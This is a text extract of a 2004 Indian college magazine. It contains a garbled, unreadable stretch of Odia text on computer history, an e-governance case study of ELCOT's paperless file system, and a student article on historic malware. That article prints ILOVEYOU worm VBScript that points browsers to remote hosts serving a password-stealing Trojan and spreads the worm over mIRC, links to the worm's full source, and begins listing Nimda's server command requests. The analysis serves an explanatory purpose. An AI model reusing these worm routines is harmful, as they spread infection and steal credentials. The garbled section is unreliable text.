x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 36: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

